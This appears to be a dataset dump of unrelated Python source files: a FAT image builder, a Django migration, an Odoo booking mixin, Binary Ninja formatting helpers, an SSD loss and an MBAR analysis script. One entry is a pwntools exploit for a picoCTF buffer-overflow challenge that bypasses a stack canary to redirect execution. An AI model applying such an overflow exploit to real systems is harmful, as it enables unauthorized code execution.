text string | size int64 | token_count int64 |
|---|---|---|
# SPDX-FileCopyrightText: 2021 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import os
from typing import List, Optional, Tuple
from .entry import Entry
from .exceptions import FatalError, WriteDirectoryException
from .fat import FAT, Cluster
from .fatfs_state import FATFSState
from .utils import required_clusters_count, split_content_into_sectors, split_to_name_and_extension
class File:
    """Represents a single file in the generated FAT filesystem and exposes
    the API used to write its content into the binary image.
    """

    # FAT attribute flag marking a regular-file directory entry.
    ATTR_ARCHIVE = 0x20
    ENTITY_TYPE = ATTR_ARCHIVE

    def __init__(self, name: str, fat: FAT, fatfs_state: FATFSState, entry: Entry, extension: str = '') -> None:
        self.name = name
        self.extension = extension
        self.fat = fat
        self.fatfs_state = fatfs_state
        self._entry = entry
        self._first_cluster = None
        self.size = 0

    @property
    def entry(self) -> Entry:
        """Directory entry describing this file."""
        return self._entry

    @property
    def first_cluster(self) -> Optional[Cluster]:
        """Head of the file's cluster chain (None until allocated)."""
        return self._first_cluster

    @first_cluster.setter
    def first_cluster(self, value: Cluster) -> None:
        self._first_cluster = value

    def name_equals(self, name: str, extension: str) -> bool:
        """Return True when both the base name and the extension match."""
        return name == self.name and extension == self.extension

    def write(self, content: str) -> None:
        """Write *content* sector by sector into the file's cluster chain."""
        self.entry.update_content_size(len(content))
        # we assume that the correct amount of clusters is allocated
        cluster = self._first_cluster
        for chunk in split_content_into_sectors(content, self.fatfs_state.sector_size):
            if cluster is None:
                raise FatalError('No free space left!')
            address = cluster.cluster_data_address
            self.fatfs_state.binary_image[address: address + len(chunk)] = chunk.encode()
            cluster = cluster.next_cluster
class Directory:
    """
    The Directory class provides API to add files and directories into the directory
    and to find the file according to path and write it.
    """
    # FAT attribute flags stored in a directory entry's attributes byte
    ATTR_DIRECTORY = 0x10
    ATTR_ARCHIVE = 0x20
    ENTITY_TYPE = ATTR_DIRECTORY

    def __init__(self,
                 name,
                 fat,
                 fatfs_state,
                 entry=None,
                 cluster=None,
                 size=None,
                 extension='',
                 parent=None):
        # type: (str, FAT, FATFSState, Optional[Entry], Cluster, Optional[int], str, Directory) -> None
        self.name = name
        self.fatfs_state = fatfs_state
        self.extension = extension
        self.fat = fat
        # a directory occupies at least one sector of entries
        self.size = size or self.fatfs_state.sector_size
        # if directory is root its parent is itself
        self.parent: Directory = parent or self
        self._first_cluster = cluster
        # entries will be initialized after the cluster allocation
        self.entries: List[Entry] = []
        # child File/Directory objects contained in this directory
        self.entities = []  # type: ignore
        self._entry = entry  # currently not in use (will use later for e.g. modification time, etc.)

    @property
    def is_root(self) -> bool:
        # the root is the only directory that is its own parent
        return self.parent is self

    @property
    def first_cluster(self) -> Cluster:
        # head of this directory's cluster chain
        return self._first_cluster

    @first_cluster.setter
    def first_cluster(self, value: Cluster) -> None:
        self._first_cluster = value

    def name_equals(self, name: str, extension: str) -> bool:
        """Return True when both the base name and the extension match."""
        return self.name == name and self.extension == extension

    def create_entries(self, cluster: Cluster) -> list:
        """Build the empty directory-entry objects backed by *cluster*'s data region."""
        return [Entry(entry_id=i,
                      parent_dir_entries_address=cluster.cluster_data_address,
                      fatfs_state=self.fatfs_state)
                for i in range(self.size // self.fatfs_state.entry_size)]

    def init_directory(self) -> None:
        """Create the entry table and, for non-root directories, the '.' and '..' links."""
        self.entries = self.create_entries(self._first_cluster)
        if not self.is_root:
            # the root directory doesn't contain link to itself nor the parent
            free_entry1 = self.find_free_entry() or self.chain_directory()
            free_entry1.allocate_entry(first_cluster_id=self.first_cluster.id,
                                       entity_name='.',
                                       entity_extension='',
                                       entity_type=self.ENTITY_TYPE)
            # NOTE(review): self-assignment is a no-op with the current trivial
            # setter — presumably kept to mirror a setter side effect; confirm
            self.first_cluster = self._first_cluster
            free_entry2 = self.find_free_entry() or self.chain_directory()
            free_entry2.allocate_entry(first_cluster_id=self.parent.first_cluster.id,
                                       entity_name='..',
                                       entity_extension='',
                                       entity_type=self.parent.ENTITY_TYPE)
            # NOTE(review): likewise a no-op self-assignment
            self.parent.first_cluster = self.parent.first_cluster

    def lookup_entity(self, object_name: str, extension: str):  # type: ignore
        """Return the child File/Directory with the given name, or None."""
        for entity in self.entities:
            if entity.name == object_name and entity.extension == extension:
                return entity
        return None

    def recursive_search(self, path_as_list, current_dir):  # type: ignore
        """Walk *path_as_list* down from *current_dir* and return the final entity.

        :raises FileNotFoundError: when any path component cannot be resolved
        """
        name, extension = split_to_name_and_extension(path_as_list[0])
        next_obj = current_dir.lookup_entity(name, extension)
        if next_obj is None:
            raise FileNotFoundError('No such file or directory!')
        if len(path_as_list) == 1 and next_obj.name_equals(name, extension):
            return next_obj
        return self.recursive_search(path_as_list[1:], next_obj)

    def find_free_entry(self) -> Optional[Entry]:
        """Return the first unused entry in this directory, or None when full."""
        for entry in self.entries:
            if entry.is_empty:
                return entry
        return None

    def _extend_directory(self) -> None:
        """Append a fresh cluster to the directory's chain and grow the entry table."""
        current = self.first_cluster
        # walk to the tail of the cluster chain
        while current.next_cluster is not None:
            current = current.next_cluster
        new_cluster = self.fat.find_free_cluster()
        current.set_in_fat(new_cluster.id)
        current.next_cluster = new_cluster
        self.entries += self.create_entries(new_cluster)

    def chain_directory(self) -> Entry:
        """Extend the directory by one cluster and return a free entry from it."""
        self._extend_directory()
        free_entry = self.find_free_entry()
        if free_entry is None:
            raise FatalError('No more space left!')
        return free_entry

    def allocate_object(self,
                        name,
                        entity_type,
                        path_from_root=None,
                        extension=''):
        # type: (str, int, Optional[List[str]], str) -> Tuple[Cluster, Entry, Directory]
        """
        Method finds the target directory in the path
        and allocates cluster (both the record in FAT and cluster in the data region)
        and entry in the specified directory
        """
        free_cluster = self.fat.find_free_cluster()
        # no path means the object goes directly into this directory
        target_dir = self if not path_from_root else self.recursive_search(path_from_root, self)
        free_entry = target_dir.find_free_entry() or target_dir.chain_directory()
        free_entry.allocate_entry(first_cluster_id=free_cluster.id,
                                  entity_name=name,
                                  entity_extension=extension,
                                  entity_type=entity_type)
        return free_cluster, free_entry, target_dir

    def new_file(self, name: str, extension: str, path_from_root: Optional[List[str]]) -> None:
        """Create a file entry under the directory addressed by *path_from_root*."""
        free_cluster, free_entry, target_dir = self.allocate_object(name=name,
                                                                    extension=extension,
                                                                    entity_type=Directory.ATTR_ARCHIVE,
                                                                    path_from_root=path_from_root)
        file = File(name, fat=self.fat, extension=extension, fatfs_state=self.fatfs_state, entry=free_entry)
        file.first_cluster = free_cluster
        target_dir.entities.append(file)

    def new_directory(self, name, parent, path_from_root):
        # type: (str, Directory, Optional[List[str]]) -> None
        """Create a sub-directory entry and initialize its '.'/'..' links."""
        free_cluster, free_entry, target_dir = self.allocate_object(name=name,
                                                                    entity_type=Directory.ATTR_DIRECTORY,
                                                                    path_from_root=path_from_root)
        directory = Directory(name=name, fat=self.fat, parent=parent, fatfs_state=self.fatfs_state, entry=free_entry)
        directory.first_cluster = free_cluster
        directory.init_directory()
        target_dir.entities.append(directory)

    def write_to_file(self, path: List[str], content: str) -> None:
        """
        Writes to file existing in the directory structure.

        :param path: path split into the list
        :param content: content as a string to be written into a file
        :returns: None
        :raises WriteDirectoryException: raised if the target object for writing is a directory
        """
        entity_to_write = self.recursive_search(path, self)
        if isinstance(entity_to_write, File):
            # reserve the cluster chain first, then stream the content into it
            clusters_cnt = required_clusters_count(cluster_size=self.fatfs_state.sector_size, content=content)
            self.fat.allocate_chain(entity_to_write.first_cluster, clusters_cnt)
            entity_to_write.write(content)
        else:
            raise WriteDirectoryException(f'`{os.path.join(*path)}` is a directory!')
| 9,531 | 2,623 |
# Generated by Django 2.0 on 2018-03-07 12:12
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a free-text ``name`` column to the ``passenger`` model."""

    # Must be applied after the app's initial schema migration.
    dependencies = [
        ('titanic', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='passenger',
            name='name',
            # default='' backfills existing rows with an empty string
            field=models.CharField(default='', max_length=200),
        ),
    ]
| 385 | 131 |
# Copyright 2020 Akretion (http://www.akretion.com).
# @author Sébastien BEAU <sebastien.beau@akretion.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from collections import defaultdict
from dateutil.relativedelta import relativedelta
from odoo import _, fields, models
from odoo.exceptions import UserError
from odoo.osv import expression
# Concept
# open_slot is the range of time where the ressource can be book
# available_slot is the range of time where the ressource is available for booking
# booked_slot is a slot already booked
# bookable_slot is a slot (with a size if slot_duration) that fit into
# an available slot
class BookableMixin(models.AbstractModel):
    """Mixin adding booking capabilities to a resource model.

    Concepts:
    - open slot: range of time where the resource can be booked
    - available slot: range of time where the resource is available for booking
    - booked slot: a slot already booked
    - bookable slot: a slot (sized by ``slot_duration``) that fits into
      an available slot
    """

    _name = "bookable.mixin"
    _description = "Bookable Mixin"

    # Length of a single bookable slot, in minutes.
    slot_duration = fields.Float()
    # Number of simultaneous bookings a slot can hold.
    slot_capacity = fields.Integer()

    def _get_slot_duration(self):
        """Return the slot duration in minutes (override hook)."""
        return self.slot_duration

    def _get_slot_capacity(self):
        """Return the slot capacity (override hook)."""
        return self.slot_capacity

    def _get_booked_slot(self, start, stop):
        """Return the calendar events already booked inside [start, stop]."""
        domain = self._get_domain(start, stop)
        return self.env["calendar.event"].search(
            expression.AND([domain, [("booking_type", "=", "booked")]])
        )

    def _build_timeline_load(self, start, stop):
        """Build a sorted list of (datetime, load_delta) booking transitions.

        Each booked slot contributes +1 at its start (clamped to *start* when
        it began earlier) and -1 at its stop when the stop falls inside the
        window; *start* and *stop* are always present with a zero delta so the
        timeline covers the whole requested range.
        """
        timeline = defaultdict(int)
        timeline.update({start: 0, stop: 0})
        for booked_slot in self._get_booked_slot(start, stop):
            if booked_slot.start < start:
                timeline[start] += 1
            else:
                timeline[booked_slot.start] += 1
            if booked_slot.stop < stop:
                timeline[booked_slot.stop] -= 1
        timeline = list(timeline.items())
        timeline.sort()
        return timeline

    def _get_available_slot(self, start, stop):
        """Return [start, stop] pairs where the load stays below capacity.

        Walks the load timeline, opening a slot whenever the load drops below
        the capacity and closing it when the load reaches the capacity again.
        """
        load_timeline = self._build_timeline_load(start, stop)
        load = 0
        slots = []
        slot = None
        capacity = self._get_slot_capacity()
        for dt, load_delta in load_timeline:
            load += load_delta
            if slot is None:
                # Fix: previously this branch fell through to ``slot[1] = dt``
                # and raised TypeError when the window opened at full capacity
                # (slot was still None). Only open a slot when below capacity.
                if load < capacity:
                    slot = [dt, None]
                    slots.append(slot)
            else:
                # extend the current slot; close it once capacity is reached
                slot[1] = dt
                if load >= capacity:
                    slot = None
        return slots

    def _prepare_bookable_slot(self, open_slot, start, stop):
        """Return the values describing one bookable slot.

        If needed you can inject extra information from the open_slot.
        """
        return {"start": start, "stop": stop}

    def _build_bookable_slot(self, open_slot, start, stop):
        """Cut [start, stop] into consecutive slots of ``slot_duration`` minutes."""
        bookable_slots = []
        delta = self._get_slot_duration()
        while True:
            slot_stop = start + relativedelta(minutes=delta)
            # drop the trailing partial slot that would overflow the range
            if slot_stop > stop:
                break
            bookable_slots.append(
                self._prepare_bookable_slot(open_slot, start, slot_stop)
            )
            start += relativedelta(minutes=delta)
        return bookable_slots

    def get_open_slot(self, start, stop):
        """Return the 'bookable' calendar events overlapping [start, stop]."""
        domain = self._get_domain(start, stop)
        domain = expression.AND([domain, [("booking_type", "=", "bookable")]])
        # NOTE(review): the ordering field is "start_date" while the domain
        # filters on "start"/"stop" — confirm this is the intended sort key
        return self.env["calendar.event"].search(domain, order="start_date")

    def get_bookable_slot(self, start, stop):
        """Return every bookable slot between *start* and *stop*."""
        start = fields.Datetime.to_datetime(start)
        stop = fields.Datetime.to_datetime(stop)
        slots = []
        for open_slot in self.get_open_slot(start, stop):
            # clamp each open slot to the requested window before slicing it
            for slot_start, slot_stop in self._get_available_slot(
                max(open_slot.start, start), min(open_slot.stop, stop)
            ):
                slots += self._build_bookable_slot(open_slot, slot_start, slot_stop)
        return slots

    def _get_domain_for_current_object(self):
        """Domain matching the calendar events attached to this record."""
        return [
            ("res_model", "=", self._name),
            ("res_id", "=", self.id),
        ]

    def _get_domain(self, start, stop):
        """Domain matching every slot overlapping the range [start, stop].

        Be careful: we need to search for every slot (bookable and booked)
        that exists in the range start/stop, i.e. slots that
        - started before and finish in the range
        - started and finished in the range
        - started in the range and finish after
        Expressed differently, it is
        - all slots that start in the range
        - all slots that finish in the range
        """
        domain = self._get_domain_for_current_object()
        return expression.AND(
            [
                domain,
                [
                    "|",
                    "&",
                    ("start", ">=", start),
                    ("start", "<", stop),
                    "&",
                    ("stop", ">", start),
                    ("stop", "<=", stop),
                ],
            ]
        )

    def _check_load(self, start, stop):
        """Raise when the bookings within [start, stop] exceed the capacity."""
        load_timeline = self._build_timeline_load(start, stop)
        capacity = self._get_slot_capacity()
        load = 0
        for _dt, load_delta in load_timeline:
            load += load_delta
            if load > capacity:
                raise UserError(_("The slot is not available anymore"))

    def _prepare_booked_slot(self, vals):
        """Complete *vals* so they create a 'booked' event linked to this record."""
        vals.update(
            {
                "res_model_id": self.env["ir.model"]
                .search([("model", "=", self._name)])
                .id,
                "res_id": self.id,
                "booking_type": "booked",
                "start": fields.Datetime.to_datetime(vals["start"]),
                "stop": fields.Datetime.to_datetime(vals["stop"]),
            }
        )
        return vals

    def _check_duration(self, start, stop):
        """Raise unless stop - start matches the configured slot duration."""
        duration = (stop - start).total_seconds() / 60.0
        if duration != self._get_slot_duration():
            raise UserError(_("The slot duration is not valid"))

    def _check_on_open_slot(self, start, stop):
        """Raise unless [start, stop] lies fully inside one open slot."""
        domain = self._get_domain_for_current_object()
        domain = expression.AND(
            [
                domain,
                [
                    ("start", "<=", start),
                    ("stop", ">=", stop),
                ],
            ]
        )
        open_slot = self.env["calendar.event"].search(domain)
        if not open_slot:
            raise UserError(_("The slot is not on a bookable zone"))

    def book_slot(self, vals):
        """Create a booked calendar event for this record and return it.

        The load check runs after creation so the new booking itself is
        counted — presumably relying on the transaction being rolled back
        when UserError is raised (confirm with the calling context).
        """
        self.ensure_one()
        vals = self._prepare_booked_slot(vals)
        self._check_on_open_slot(vals["start"], vals["stop"])
        self._check_duration(vals["start"], vals["stop"])
        slot = self.env["calendar.event"].create(vals)
        self._check_load(vals["start"], vals["stop"])
        return slot
| 6,625 | 1,970 |
from binaryninja import InstructionTextToken
from binaryninja.enums import InstructionTextTokenType
# Public API of this helper module: numeric formatters plus the token/asm builders.
__all__ = ['fmt_dec', 'fmt_dec_sign',
           'fmt_hex', 'fmt_hex2', 'fmt_hex4', 'fmt_hexW', 'fmt_hex_sign']
__all__ += ['fmt_imm', 'fmt_imm_sign', 'fmt_disp', 'fmt_code_rel', 'fmt_code_abs']
__all__ += ['token', 'asm']
def fmt_dec(value):
    """Render *value* as a plain decimal string."""
    return format(value, "d")
def fmt_dec_sign(value):
    """Render *value* as a decimal string with an explicit sign."""
    return format(value, "+d")
def fmt_hex(value):
    """Render *value* as 0x-prefixed hexadecimal with no padding."""
    return format(value, "#x")
def fmt_hex2(value):
    """Render *value* as a zero-padded two-digit hex byte, e.g. ``0x05``.

    Fix: ``{:#02x}`` never pads because the ``#`` alternate-form prefix
    (``0x``) counts toward the field width — a total width of 4 is needed
    to guarantee two hex digits after the prefix.
    """
    return "{:#04x}".format(value)
def fmt_hex4(value):
    """Render *value* as a zero-padded four-digit hex word, e.g. ``0x001f``.

    Fix: ``{:#04x}`` only yields two hex digits because the ``#`` prefix
    (``0x``) counts toward the field width — a total width of 6 is needed
    for four hex digits after the prefix.
    """
    return "{:#06x}".format(value)
def fmt_hexW(value, width):
    """Render *value* as hex for an operand *width* of 1 or 2 bytes."""
    dispatch = {1: fmt_hex2, 2: fmt_hex4}
    if width not in dispatch:
        raise ValueError('Invalid width {}'.format(width))
    return dispatch[width](value)
def fmt_hex_sign(value):
    """Render *value* as 0x-prefixed hex with an explicit sign."""
    return format(value, "+#x")
def fmt_imm(value):
    """Render an immediate: decimal when it fits in a byte, hex otherwise."""
    return "{:d}".format(value) if value < 256 else "{:#x}".format(value)
def fmt_imm_sign(value):
    """Render a signed immediate: decimal for byte-sized magnitudes, hex otherwise."""
    if abs(value) < 256:
        return "{:+d}".format(value)
    return "{:+#x}".format(value)
def fmt_disp(value):
    """Render a displacement as unpadded 0x-prefixed hex."""
    return format(value, "#x")
def fmt_code_abs(value):
    """Render an absolute code address (delegates to the 4-digit hex formatter)."""
    return fmt_hex4(value)
def fmt_code_rel(value):
    """Render a relative code offset as sign-prefixed hex."""
    return "{:+#x}".format(value)
def token(kind, text, *data):
    """Build an InstructionTextToken of the given short *kind* name.

    :param kind: short token-kind name (e.g. 'opcode', 'reg', 'int')
    :param text: display text of the token
    :param data: extra positional arguments forwarded to InstructionTextToken
    :raises ValueError: when *kind* is not a known token kind
    """
    kind_map = {
        'opcode': InstructionTextTokenType.OpcodeToken,
        'opsep': InstructionTextTokenType.OperandSeparatorToken,
        'instr': InstructionTextTokenType.InstructionToken,
        'text': InstructionTextTokenType.TextToken,
        'reg': InstructionTextTokenType.RegisterToken,
        'int': InstructionTextTokenType.IntegerToken,
        'addr': InstructionTextTokenType.PossibleAddressToken,
        'codeRelAddr': InstructionTextTokenType.CodeRelativeAddressToken,
        'beginMem': InstructionTextTokenType.BeginMemoryOperandToken,
        'endMem': InstructionTextTokenType.EndMemoryOperandToken,
    }
    if kind not in kind_map:
        raise ValueError('Invalid token kind {}'.format(kind))
    return InstructionTextToken(kind_map[kind], text, *data)
def asm(*parts):
    """Convert ``(kind, text, ...)`` tuples into a list of instruction tokens."""
    return [token(*part) for part in parts]
| 2,432 | 800 |
# -*- coding: utf-8 -*-
"""Top-level package for beerlists."""

# Package metadata dunders (author/contact/version), conventionally read by
# packaging and documentation tooling.
__author__ = """David Todd"""
__email__ = 'dmofot@gmail.com'
__version__ = '0.9.0'
| 148 | 66 |
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from data import coco as cfg
from ..box_utils import match, log_sum_exp, decode, nms
class PrecisionLoss(nn.Module):
    """SSD Weighted Loss Function
    Compute Targets:
        1) Produce Confidence Target Indices by matching ground truth boxes
           with (default) 'priorboxes' that have jaccard index > threshold parameter
           (default threshold: 0.5).
        2) Produce localization target by 'encoding' variance into offsets of ground
           truth boxes and their matched 'priorboxes'.
        3) Hard negative mining to filter the excessive number of negative examples
           that comes with using a large number of default bounding boxes.
           (default negative:positive ratio 3:1)
    Objective Loss:
        L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
        Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss
        weighted by α which is set to 1 by cross val.
        Args:
            c: class confidences,
            l: predicted boxes,
            g: ground truth boxes
            N: number of matched default boxes
        See: https://arxiv.org/pdf/1512.02325.pdf for more details.
    """

    def __init__(self, num_classes, overlap_thresh, prior_for_matching,
                 bkg_label, top_k, encode_target, nms_thresh, conf_thresh,
                 use_gpu=True):
        # num_classes: number of classes including background
        # overlap_thresh: jaccard-overlap threshold used by match()
        # top_k / nms_thresh / conf_thresh: parameters of the per-class NMS pass
        super(PrecisionLoss, self).__init__()
        self.use_gpu = use_gpu
        self.num_classes = num_classes
        self.threshold = overlap_thresh
        self.background_label = bkg_label
        self.encode_target = encode_target
        self.use_prior_for_matching = prior_for_matching
        # bbox encoding variances taken from the COCO config
        self.variance = cfg['variance']
        self.top_k = top_k
        # NOTE(review): the message says "non negative" but the check also
        # rejects 0 — the threshold effectively must be strictly positive
        if nms_thresh <= 0:
            raise ValueError('nms_threshold must be non negative.')
        self.nms_thresh = nms_thresh
        self.softmax = nn.Softmax(dim=-1)
        self.conf_thresh = conf_thresh

    def forward(self, predictions, targets):
        """Multibox Loss
        Args:
            predictions (tuple): A tuple containing loc preds, conf preds,
                and prior boxes from SSD net.
                conf shape: torch.size(batch_size,num_priors,num_classes)
                loc shape: torch.size(batch_size,num_priors,4)
                priors shape: torch.size(num_priors,4)
            targets (tensor): Ground truth boxes and labels for a batch,
                shape: [batch_size,num_objs,5] (last idx is the label).
        Returns:
            (loss_l, loss_c): smooth-L1 localization loss and cross-entropy
            confidence loss, each normalized by the effective entry count N.
        """
        loc_data, conf_data, priors = predictions
        # torch.save(loc_data, 'inter/loc_data.pt')
        # torch.save(conf_data, 'inter/conf_data.pt')
        # torch.save(priors, 'inter/priors.pt')
        # torch.save(targets, 'inter/targets.pt')
        num = loc_data.size(0)
        # trim priors to the number of location predictions
        priors = priors[:loc_data.size(1), :]
        # confused here, why stuck at loc_data size 1
        num_priors = (priors.size(0))
        # prior_data = priors.view(1, num_priors, 4)
        # print(prior_data.size())
        num_classes = self.num_classes
        # match priors (default boxes) and ground truth boxes;
        # match() fills loc_t/conf_t in place for each image idx
        loc_t = torch.Tensor(num, num_priors, 4)
        # [num, num_priors, 4]
        conf_t = torch.LongTensor(num, num_priors)
        # [num_priors] top class label for each prior
        for idx in range(num):
            truths = targets[idx][:, :-1].data
            labels = targets[idx][:, -1].data
            defaults = priors.data
            match(self.threshold, truths, defaults, self.variance, labels,
                  loc_t, conf_t, idx)
        if self.use_gpu:
            loc_t = loc_t.cuda()
            conf_t = conf_t.cuda()
        # wrap targets
        # NOTE(review): Variable is a no-op wrapper on modern PyTorch (>=0.4)
        loc_t = Variable(loc_t, requires_grad=False)
        conf_t = Variable(conf_t, requires_grad=False)
        conf_preds = self.softmax(conf_data.view(num, num_priors,
                                                 self.num_classes))
        # print(conf_preds.max()) 0.98
        conf_preds_trans = conf_preds.transpose(2,1)
        # [num, num_classes, num_priors]
        # NOTE(review): unconditional .cuda() here ignores self.use_gpu —
        # this will fail on CPU-only runs; confirm whether that is intended
        conf_p = torch.zeros(num, num_priors, num_classes).cuda()
        # [num, num_priors, num_classes]
        loc_p = torch.zeros(num, num_priors, 4).cuda()
        # Decode predictions into bboxes
        for i in range(num):
            decoded_boxes = decode(loc_data[i], priors, self.variance)
            # For each class, perform nms
            conf_scores = conf_preds_trans[i].clone()
            # class 0 (background) is skipped
            for cl in range(1, self.num_classes):
                c_mask = conf_scores[cl].gt(self.conf_thresh)
                scores = conf_scores[cl][c_mask]
                if scores.size(0) == 0:
                    continue
                # fliter low conf predictions
                l_mask = c_mask.unsqueeze(1).expand_as(decoded_boxes)
                boxes = Variable(decoded_boxes[l_mask].view(-1, 4), requires_grad=False)
                # idx of highest scoring and non-overlapping boxes per class
                # boxes [num_priors(has been flitered), 4] location preds for i'th image
                ids, count = nms(boxes, scores, self.nms_thresh, self.top_k)
                # keep the confidences that survived the threshold mask
                conf_p[i, c_mask, cl] = conf_preds[i, c_mask, cl]  # [num, num_priors, num_classes]
                # keep only the loc predictions that survived NMS
                loc_p[i, l_mask[:,0].nonzero()[ids][:count]] = loc_data[i, l_mask[:,0].nonzero()[ids][:count]]  # [num, num_priors, 4]
        # check each result if match the ground truth;
        # a prior is "effective" when at least one class confidence was kept
        effect_conf = conf_p.sum(2) != 0
        effect_conf_idx = effect_conf.unsqueeze(2).expand_as(conf_p)
        effect_loc_idx = effect_conf.unsqueeze(2).expand_as(loc_t)
        # [num, num_priors, num_classes] binary metric, thousands will be True in million
        # torch.save(conf_preds, 'inter/conf_preds.pt')
        # torch.save(effect_conf, 'inter/effect_conf.pt')
        # torch.save(effect_loc, 'inter/effect_loc.pt')
        # torch.save(conf_p, 'inter/conf_p.pt')
        # torch.save(conf_t, 'inter/conf_t.pt')
        # torch.save(effect_conf, 'inter/effect_conf.pt')
        # NOTE(review): size_average= is deprecated in modern PyTorch in
        # favor of reduction='sum' — confirm the target torch version
        loss_c = F.cross_entropy(conf_p[effect_conf_idx].view(-1, num_classes), conf_t[effect_conf].view(-1), size_average=False)
        loss_l = F.smooth_l1_loss(loc_p[effect_loc_idx], loc_t[effect_loc_idx], size_average=False)
        # conf_p [num*num_p, num_classes] conf_t [num*num_p, 1(label)]
        N = effect_conf_idx.data.sum()
        loss_l /= N.float()
        loss_c /= N.float()
        return loss_l, loss_c
| 6,551 | 2,176 |
#!/usr/bin/env python
# NOTE: Python 2 script (print statements, str-based pwntools payloads).
# picoCTF 2018 "buffer overflow 3" exploit: bypass a static stack canary
# and overwrite the return address with the win() function.
from pwn import *

# Toggle between a local ./vuln process and the remote shell server.
debug = 0
user = 'mitsububunu'
pw = 'password'
if debug:
    p = process('./vuln')
else:
    s = ssh(host = '2018shell.picoctf.com', user=user, password=pw)
    s.set_working_directory('/problems/buffer-overflow-3_1_2e6726e5326a80f8f5a9c350284e6c7f')
    p = s.process('./vuln')
binary = ELF('./vuln')
# Known 4-byte canary value placed on the stack by the challenge binary.
canary = '4xV,'
print p.recvuntil('>')
# Declare an oversized input length so the following write overflows.
p.sendline('300')
print p.recvuntil('>')
# Payload layout: 32 filler bytes up to the canary, the canary itself,
# 16 more filler bytes up to the saved return address, then &win.
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + canary + 'AAAABBBBCCCCDDDD' + p32(binary.symbols['win']))
print p.recvall()
from .reports import (
IndividualResponseStats,
ResponseList,
DevicesReport,
OptInList,
OptOutList,
PushList,
ResponseReportList,
AppOpensList,
TimeInAppList,
)
| 197 | 66 |
# Example illustrating the application of MBAR to compute a 1D PMF from an umbrella sampling simulation.
#
# The data represents an umbrella sampling simulation for the magnetization of the Ising model
# Adapted from one of the pymbar example scripts for 1D PMFs
import numpy as np # numerical array library
import pymbar # multistate Bennett acceptance ratio
import os
from pymbar import timeseries # timeseries analysis
from pymbar.utils import logsumexp
from glob import glob
from matplotlib.ticker import AutoMinorLocator
from scipy.optimize import brentq
import scipy.signal as signal
from scipy.signal import savgol_filter
kB = 1.0 # Boltzmann constant
# Parameters
temperature = 3.0 # assume a single temperature -- can be overridden with data from param file
N_max = 50000 # maximum number of snapshots/simulation
N_max_ref = 50000 # maximum number of snapshots/simulation
folders_top = glob("*/") # total number of temperatures
folders_1 = []
curdir = os.getcwd()
for i in range(len(folders_top)):
os.chdir(curdir+'/'+folders_top[i])
folders_bottom = glob("*/")
for j in range(len(folders_bottom)):
os.chdir(curdir+'/'+folders_top[i]+'/'+folders_bottom[j])
folders_1.append(os.getcwd())
os.chdir(curdir)
K = len(folders_1)
T_k = np.ones(K,float)*temperature # inital temperatures are all equal
beta = 1.0 / (kB * temperature) # inverse temperature of simulations
mag_min = -1580 # min for magnetization
mag_max = 1580 # max for magnetization
mag_nbins = 395 # number of bins for magnetization
# Need to delete ext terms
# Allocate storage for simulation data
N_max = 50000
N_k = np.zeros([K], np.int32) # N_k[k] is the number of snapshots from umbrella simulation k
K_k = np.zeros([K], np.float64) # K_1_k[k] is the spring constant 1 for umbrella simulation k
mu_k = np.zeros([K], np.float64) # mu_k[k] is the chemical potential for umbrella simulation k
mag0_k = np.zeros([K], np.float64) # mag0_k[k] is the spring center location for umbrella simulation k
mag_kn = np.zeros([K,N_max], np.float64) # mag_kn[k,n] is the magnetization for snapshot n from umbrella simulation k
u_kn = np.zeros([K,N_max], np.float64) # u_kn[k,n] is the reduced potential energy without umbrella restraints of snapshot n of umbrella simulation k
g_k = np.zeros([K],np.float32);
# Read in umbrella spring constants and centers.
# Go through directories and read
umbrella_index = 0
for i in range(K):
infile = open(folders_1[i]+'/param')
for line in infile:
line_strip = line.strip()
if line_strip.startswith('harmon'):
print(line_strip)
line_split = line_strip.split()[1]
K_k[i] = float(line_split)
if line_strip.startswith('window'):
print(line_strip)
line_split = line_strip.split()[1]
mag0_k[i] = float(line_split)
if line_strip.startswith('T'):
print(line_strip)
line_split = line_strip.split()[1]
T_k[i] = float(line_split)
if line_strip.startswith('h_external'):
print(line_strip)
line_split = line_strip.split()[1]
mu_k[i] = float(line_split)
beta_k = 1.0/(kB*T_k) # beta factor for the different temperatures
print(beta_k)
print(mu_k)
if (np.min(T_k) == np.max(T_k)):
DifferentTemperatures = False # if all the temperatures are the same, then we don't have to read in energies.
# Read the simulation data
for i in range(K):
k = i
string_base = folders_1[i]
# Read magnetization data.
filename_mag = string_base+'/mbar_data.txt'
print("Reading %s..." % filename_mag)
infile = open(filename_mag, 'r')
lines = infile.readlines()
infile.close()
# Parse data.
n = 0
for line in lines:
tokens = line.split()
mag = float(tokens[2]) # Magnetization
u_kn[k,n] = float(tokens[1]) - float(tokens[0]) + mu_k[k]*mag # reduced potential energy without umbrella restraint and external field
mag_kn[k,n] = mag
n += 1
N_k[k] = n
# Compute correlation times for potential energy and magnetization
# timeseries. If the temperatures differ, use energies to determine samples; otherwise, magnetization
g_k[k] = timeseries.statisticalInefficiency(mag_kn[k,0:N_k[k]])
print("Correlation time for set %5d is %10.3f" % (k,g_k[k]))
indices = timeseries.subsampleCorrelatedData(mag_kn[k,0:N_k[k]], g=g_k[k])
# Subsample data.
N_k[k] = len(indices)
u_kn[k,0:N_k[k]] = u_kn[k,indices]
mag_kn[k,0:N_k[k]] = mag_kn[k,indices]
N_max = np.max(N_k) # shorten the array size
# At this point, start diverting from the usual path and allow a method that allows us to perform blocking/bootstrapping analysis
mag_n = mag_kn[0,0:N_k[0]] # mag_n[k] is the magnetization from some simulation snapshot
u_n = u_kn[0,0:N_k[0]] # u_n[k] is the potential energy from some snapshot that has mag value mag_n[k]
# Now append values
allN = N_k.sum()
for k in range(1,K):
mag_n = np.append(mag_n, mag_kn[k,0:N_k[k]])
u_n = np.append(u_n, u_kn[k,0:N_k[k]])
# Bootstrap time
N_bs = 20 # number of bootstrap samples
N_bs_start = 0 # index to start with outputs
np.random.seed(0)
# Some variable to skip output #
mbar_ref = []
mbar_count = 0
for N_ in range(N_bs_start,N_bs_start+N_bs):
print("Iteration %d" % (N_))
f_bs = open('mbar_'+str(N_)+'.txt', 'w')
